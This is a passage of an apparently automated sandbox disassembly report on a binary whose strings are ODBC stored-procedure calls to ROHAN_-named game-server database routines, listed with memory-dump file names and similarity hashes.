                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [Rohan_InsMallItem] (?,?,?,?)}
                                                                                      • API String ID: 0-672221449
                                                                                      • Opcode ID: 72c90a9feb87e97f5db579e02f16866cca2c8b2aa528d4f6d1616956b8d1afc7
                                                                                      • Instruction ID: 862dd99a18b3d631e6a86a14ad3970826a23a6b9776f4f40b1262fc1daa274db
                                                                                      • Opcode Fuzzy Hash: 72c90a9feb87e97f5db579e02f16866cca2c8b2aa528d4f6d1616956b8d1afc7
                                                                                      • Instruction Fuzzy Hash: 9E41E2B1680314BBEB249B54CC52FD973B4EB88F28F6081C9F7146E6C5D5B5AB808B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetTuserLastAttnd] (?, ?, ?, ?)},000000FD), ref: 00441300
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0044133F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00441377
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004413AF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004413E7
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0044141F
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetTuserLastAttnd] (?, ?, ?, ?)}, xrefs: 004412F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetTuserLastAttnd] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-1032348027
                                                                                      • Opcode ID: 00fc3a961af78e9a0b36fe30a767fa561d1308af4e13936c9d8c5f8bbd164bca
                                                                                      • Instruction ID: be2900a5efc884e11fb334ef89d30cd794566cadc6fc2e691cb9354ec85f2f64
                                                                                      • Opcode Fuzzy Hash: 00fc3a961af78e9a0b36fe30a767fa561d1308af4e13936c9d8c5f8bbd164bca
                                                                                      • Instruction Fuzzy Hash: 67410EB0645214BBEB249B44CC52FEA7334EB84B18F2082C9F7287E6C5C5B16F408B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_SaveItem](?, ?, ?, ?)},000000FD), ref: 0042C82F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042C86E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042C8A6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042C8DE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042C916
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042C94E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_SaveItem](?, ?, ?, ?)}, xrefs: 0042C826
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_SaveItem](?, ?, ?, ?)}
                                                                                      • API String ID: 0-2562309105
                                                                                      • Opcode ID: 706cf1aaee3d0978ee74d76bc609b5ceb0ae7e485cbf6c2d17c342d1ecbef897
                                                                                      • Instruction ID: 6dab473c7e76303a54bb377cead051c7b528362d402b658993439a48c7c23ac0
                                                                                      • Opcode Fuzzy Hash: 706cf1aaee3d0978ee74d76bc609b5ceb0ae7e485cbf6c2d17c342d1ecbef897
                                                                                      • Instruction Fuzzy Hash: B441EEB07842167FEB248B54CC52FAA7238EFC5B38F204288F7666E2C1D5B169408B5D
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetTradeItemPaging] (?,?,?,?)},000000FD), ref: 00437297
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004372D6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043730B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00437343
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043737B
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004373B3
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetTradeItemPaging] (?,?,?,?)}, xrefs: 0043728E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetTradeItemPaging] (?,?,?,?)}
                                                                                      • API String ID: 0-1628133889
                                                                                      • Opcode ID: 708d9f74c99b05152c2393bb10270714b83f44d574e2e072f08ec88bcf2bfcbd
                                                                                      • Instruction ID: 19493aa83f1187ed111dce8902569debf5f7a103abf1eba3fe9cc62cb30ec3f5
                                                                                      • Opcode Fuzzy Hash: 708d9f74c99b05152c2393bb10270714b83f44d574e2e072f08ec88bcf2bfcbd
                                                                                      • Instruction Fuzzy Hash: 4A4110B4644215BBFB28CB54CC56FAA7335EB84B14F208388F72D6E2C5D9B16D418B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SaveSkillCoolTime] (?, ?, ?, ?)},000000FD), ref: 0042E415
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042E454
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042E489
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E4C1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042E4F9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E531
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SaveSkillCoolTime] (?, ?, ?, ?)}, xrefs: 0042E40C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SaveSkillCoolTime] (?, ?, ?, ?)}
                                                                                      • API String ID: 0-214873549
                                                                                      • Opcode ID: d1468a0c44200d5360136a8c8fb3b461e3f7fa91d4d33a19892a7dabf5156218
                                                                                      • Instruction ID: b62d9ff696ffb62523db95c1e3c4fd006aef9b86f971258ff45661cf3120816e
                                                                                      • Opcode Fuzzy Hash: d1468a0c44200d5360136a8c8fb3b461e3f7fa91d4d33a19892a7dabf5156218
                                                                                      • Instruction Fuzzy Hash: AD411EB0A806557FEB348B44CC52FAB7774EB84B19F10828AF6187E2C5D6B56A40CF48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InsertTuserLastAttnd] (?,?,?,?)},000000FD), ref: 00441449
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00441488
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004414BD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004414F5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0044152D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00441565
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InsertTuserLastAttnd] (?,?,?,?)}, xrefs: 00441440
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InsertTuserLastAttnd] (?,?,?,?)}
                                                                                      • API String ID: 0-2321350776
                                                                                      • Opcode ID: 8a535e58c0d6176435df0c86c240b139e133d92ec05aa6d80f6432c9c4f0ae49
                                                                                      • Instruction ID: 3c4b3723307dc29d3ff1e5e757a4b471b3466ebf60f3afb6df5a2279cbf74604
                                                                                      • Opcode Fuzzy Hash: 8a535e58c0d6176435df0c86c240b139e133d92ec05aa6d80f6432c9c4f0ae49
                                                                                      • Instruction Fuzzy Hash: 3541EFB17802147BEB289B54CC52FE97334FB84B58F204289F7196E6C5D6B17E808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_UpdateCharacterRecipe](?,?,?,?)},000000FD), ref: 004366DB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043671A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043674F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436787
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004367BF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004367F7
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_UpdateCharacterRecipe](?,?,?,?)}, xrefs: 004366D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
